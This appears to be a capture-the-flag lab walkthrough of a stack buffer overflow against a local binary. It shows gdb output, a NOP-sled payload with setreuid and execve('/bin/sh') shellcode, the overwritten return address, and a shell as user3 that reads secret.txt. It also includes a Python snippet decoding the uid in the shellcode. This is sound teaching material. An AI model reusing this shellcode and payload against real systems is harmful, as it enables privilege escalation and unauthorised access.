The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-4/buffer-overflow-2 $(python -c "print('\x90' * 90 + '\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 19 + 'B' * 6)")
new word is doggo������������������������������������������������������������������������������������������1�f��jqXH��j;XH1�I�//bin/shI�APH��RWH��j<XH1�AAAAAAAAAAAAAAAAAAABBBBBB
Program received signal SIGSEGV, Segmentation fault.
0x0000424242424242 in ?? ()
The return address is overwritten, so we just need to replace the 6 * B with the memory address where the shellcode starts:
(gdb) x/100x $rsp-164
0x7fffffffe23c: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe24c: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe25c: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe26c: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe27c: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe28c: 0x31909090 0xeabf66ff 0x58716a03 0x0ffe8948
0x7fffffffe29c: 0x583b6a05 0x49d23148 0x622f2fb8 0x732f6e69
0x7fffffffe2ac: 0xe8c14968 0x48504108 0x5752e789 0x0fe68948
0x7fffffffe2bc: 0x583c6a05 0x0fff3148 0x41414105 0x41414141
0x7fffffffe2cc: 0x41414141 0x41414141 0x41414141 0x42424242
0x7fffffffe2dc: 0x00004242 0xffffe3d8 0x00007fff 0x00000000
0x7fffffffe2ec: 0x00000002 0x004005e0 0x00000000 0xf7a4302a
0x7fffffffe2fc: 0x00007fff 0x00000000 0x00000000 0xffffe3d8
0x7fffffffe30c: 0x00007fff 0x00040000 0x00000002 0x004005ac
0x7fffffffe31c: 0x00000000 0x00000000 0x00000000 0xa5ce3cc0
0x7fffffffe32c: 0xe848714a 0x00400450 0x00000000 0xffffe3d0
0x7fffffffe33c: 0x00007fff 0x00000000 0x00000000 0x00000000
0x7fffffffe34c: 0x00000000 0x680e3cc0 0x17b78e35 0xf1ca3cc0
0x7fffffffe35c: 0x17b79e82 0x00000000 0x00000000 0x00000000
0x7fffffffe36c: 0x00000000 0x00000000 0x00000000 0xffffe3f0
0x7fffffffe37c: 0x00007fff 0xf7ffe130 0x00007fff 0xf7de7656
0x7fffffffe38c: 0x00007fff 0x00000000 0x00000000 0x00000000
0x7fffffffe39c: 0x00000000 0x00000000 0x00000000 0x00400450
0x7fffffffe3ac: 0x00000000 0xffffe3d0 0x00007fff 0x0040047a
0x7fffffffe3bc: 0x00000000 0xffffe3c8 0x00007fff 0xf7ffdf80
We can add the address 0x7fffffffe28c at the end of our payload:
[user1@ip-10-10-64-110 overflow-4]$ ./buffer-overflow-2 $(python -c "print('\x90' * 90 + '\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 19 + '\x8c\xe2\xff\xff\xff\x7f')")
new word is doggo������������������������������������������������������������������������������������������1�f��jqXH��j;XH1�I�//bin/shI�APH��RWH��j<XH1�AAAAAAAAAAAAAAAAAAA�����
sh-4.2$ id
uid=1003(user3) gid=1001(user1) groups=1001(user1)
sh-4.2$ cat secret.txt
wowanothertime!!
Note that the setreuid shellcode has changed slightly, because the owner of secret.txt is user3, so the uid is 1003.
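The only difference between the two setreuid shellcodes is one byte: \xea for user2 and \xeb for user3. Here is a short Python 3 sketch that reads the uid back out of each one. It assumes the uid is stored as a 16-bit little-endian value at byte offsets 4 and 5, which holds for these two byte strings but is not a general rule for shellcode.

```python
import struct

def uid_from_shellcode(shellcode):
    # Assumes the layout seen in both payloads: bytes 4 and 5 hold the
    # 16-bit little-endian value that is loaded as the uid.
    return struct.unpack_from("<H", shellcode, 4)[0]

for_user2 = b"\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05"
for_user3 = b"\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05"

print(uid_from_shellcode(for_user2))  # 1002
print(uid_from_shellcode(for_user3))  # 1003
```

This is the same little-endian ordering seen earlier: 1002 is 0x03ea, stored as the bytes ea 03.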